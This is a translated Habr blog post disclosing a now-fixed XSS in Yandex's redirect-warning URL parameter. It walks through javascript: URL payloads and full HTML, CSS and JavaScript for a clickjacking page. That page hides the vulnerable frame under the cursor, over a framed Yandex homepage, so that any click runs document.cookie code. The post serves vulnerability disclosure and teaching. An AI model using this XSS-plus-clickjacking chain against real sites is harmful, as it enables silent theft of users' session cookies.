⬆️ ⬇️

Spin XSS on Yandex (fixed)





Hello, Habrazhiteli!



Today I walked on the network, went to Yandex to watch the weather in the capital. When I clicked the “other city” button, Yandex redirected me here . I think that everyone who sees such an address has a desire to replace one of the parameters, or rather retpath. :) I put the standard there
"><script>alert('xss');</script> 
and got into the source, see what is filtered and what is not. Here is a line in the source.
 <span onclick="return {'b\-form\-button':{name:'b\-form\-button', 'retpath': &quot;\&quot;&gt;&lt;script&gt;alert('xss')&quot;}}" 
Well, I think, boring, - everything is filtered. Then he looked more attentively and realized that Yandex does not add the protocol to the URL at first, here it is possible and to play. Introduced
 javascript: alert('xss'); 
- works! But unfortunately, only when you click on the "Return" button. You can try . Already more interesting, digging further ...

')





(The material is written and provided for educational purposes.)



So, what should be done so that the user does not know that he clicks on “Return”? - Right. You need to place this page in the iframe, add styles, and place it transparently over any element on our page. We try the option with frames - it does not work. Yandex checks if their site is open in a frame, and redirects the parent window (browser) to Yandex. How to solve this problem? I found the sandbox attribute for iframe, entered only in html5. And he simply forbade to redirect the user, but the way worked only in Chrome, and then, blocking the contents of the entire frame.



The mood has already begun to deteriorate, and I decided to look for where retpath is used in other places, because if a similar vulnerability exists in one place, then it will be in another. I found a couple in the “Dictionaries” and “Help”, but the “Return” button was not there. Then, due to the fact that I didn’t correctly change the parameter, Yandex sent me here , here it all started.



So, try changing the url parameter to
 javascript:alert('ahoy!'); 
and click on the link. Works! Now we try to place the address with vulnerability in the iframe. Hooray! There are no checks. Try it . Great, go ahead.



Now we need to add the necessary styles to the iframe. I decided to do this: put an i-frame with a vulnerability inside a small (100x20) diva, and move the iframe so that the user will only see the link (which you need to click on).



 <!DOCTYPE html> <html> <head> <style type="text/css"> body { margin:0; padding:0; } #helper { position: absolute; overflow: hidden; width: 200px; height: 13px; } #ifr { position: relative; top: -180px; left: -58px; } </style> </head> <body> <div id="helper"> <div style="width: 100%; height: 300px"> <iframe id="ifr" src="http://yandex.ru/redir_warning/?url=javascript:alert(document.cookie)" width="1000px" height="300" frameborder="no" scrolling="no" ></iframe> </div> </div> </body> </html> 




Done, but somehow boring! I would like the user to be unaware of anything. How to do it? Interest Ask. The first thing that came to mind is what if you move the helper element behind the mouse. This means that the user no longer needs to click in a certain place. Wherever he clicks - the script will be executed. I give the code:

  var el; window.onload = function() { var ifr = document.getElementById("ifr"); //      if(navigator.userAgent.toLowerCase().indexOf("webkit") != -1) { ifr.style.top = "-180px"; } else { ifr.style.top = "-190px"; } el = document.getElementById("helper"); window.onmousemove = onmove; } function onmove(e) { el.style.left = (e.pageX - 50) + "px"; el.style.top = (e.pageY - 12) + "px"; return false; } 


And we will open a large and visible i-frame from the main Yandex, so that the user thinks that he is still there. :)

 <iframe id="yandex" src="http://yandex.ru/" width="100%" height="100%" frameborder="no"></iframe> 


Good! Yandex allows you to open your main page within the frame.



We change the zIndex elements and make our helper invisible and add an additional transparent DIV that overlaps the Yandex iframe and avoids conflicts between the iferames.



  <div id="overlay"></div> 


 #helper { z-index: 20000; opacity: 0; } #yandex { z-index: 10; } #overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 20; } 




Ready example.

How it works?



(according to the links, alert (document.cookie) is executed)



Hope you enjoyed my article. I would be happy to comment.



At 20:30, the visibility is covered, I am very happy for Yandex, that the speed of eliminating vulnerabilities is so fast. From Yandex came to the mail:



  , !          ,      .    . --  , ...    http://help.yandex.ru/ 

Source: https://habr.com/ru/post/126800/



All Articles